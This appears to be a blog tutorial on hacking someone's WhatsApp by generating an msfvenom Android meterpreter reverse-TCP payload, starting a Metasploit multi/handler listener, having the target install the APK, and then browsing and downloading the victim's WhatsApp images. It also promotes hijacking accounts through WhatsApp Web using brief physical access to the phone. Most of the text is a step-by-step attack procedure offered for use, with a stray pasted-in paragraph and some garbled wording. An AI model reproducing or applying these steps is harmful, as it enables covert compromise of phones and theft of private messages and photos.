Today I will tell you how we can hack anyone’s Whatsapp account using the meterpreter Android Payload, we run this process on our local network, and you can try this method over the internet, but you need a static IP address and the second option is using third party tool. But today we run the process on our local network

hack whatsapp 2021
hack whatsapp 2021

Let’s open your Kali NetHunter Terminal and run the ifconfig command for checking our local machine IP address.

If you don’t have Kali NetHunter you can download and install easily without root or custom recovery

Install Kali NetHunter: How to Install Kali NetHunter in any Android PhoneRequire Software
NetHunter-Storehttps://store.nethunter.com
Termuxhttps://play.google.com/store/apps/details?id=com.termux&hl=en&gl=US or https://termux.com/
NetHunter-KeX clienthttps://store.nethunter.com/en/packages/com.offsec.nethunter.kex/ or you can find in NetHunter-Store
Hacker’s keyboardhttps://store.nethunter.com/en/packages/org.pocketworkstation.pckeyboard/ or you can find it in NetHunter-Store
10 GB+ Data or WiFi
10 GB Space of Your Internal Storage (recommend 15 GB)
80%+ Charge (recommend 100%)

ifconfig

Now we have our local machine IP address, in my case my local machine IP is 192.168.1.23, in your case your IP address is different, After getting the machine IP we need to create a msfvenom Android Payload let’s run this command for creating android reverse Payload.

msfvenom -p android/meterpreter/reverse_tcp lhost=<IP> lport=<use any port> R > output_path_here.apk

After hitting the Enter keyboard button our payload is successfully generated now we need to start our Metasploit payload listener run the msfconsole command.

msfconsole

7 Method Hack WhatsApp Chats 2021The main WhatsApp vulnerability is the web version of the service known as WhatsApp Web. To access the target’s account, all you need to do is to accurately configure WhatsApp analog in the web browser and, further, use the captured data for your own purpose. The only con of this hacking method is a requirement of physical access to the target smartphone. However, it’s necessary only for a moment. 

Our Metasploit framework is stated let’s load the android meterpreter reverse payload using the multi hander exploit.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp

Now set your local machine IP address, After set the lhost IP address I direct exploit the payload, if you use a different port for your payload you need to change your lport you can change your lport using the set lport <> command.

set lhost (YOUR IP)
exploit

Now our reverse TCP hander is stated let’s send the payload in your target mobile and run the payload on target mobile.

After open the android payload we will get a meterpreter session as we can see the in picture.

After getting a session we can run any Linux command let’s change our current working directory using this command.

cd sdcard
ls -l

Now we are inside the target mobile phone again we change our directory sdcard to WhatsApp Directory.

cd WhatsApp
ls -l

here we can see our target mobile Whatsapp Files and directory let’s move the Media directory.

cd Media
ls -l
cd WhatsApp \ Images
ls -l

You can see here your target Whatsapp image you can use the ls command for listing all images and you can download any image file using the download command.

download (YOUR FILE NAME)

Images will be coming soon…

Facebook: https://www.facebook.com/pastfutur.official

 Twitter: https://twitter.com/PastFutur

 Linkedin: https://www.linkedin.com/company/pastfutur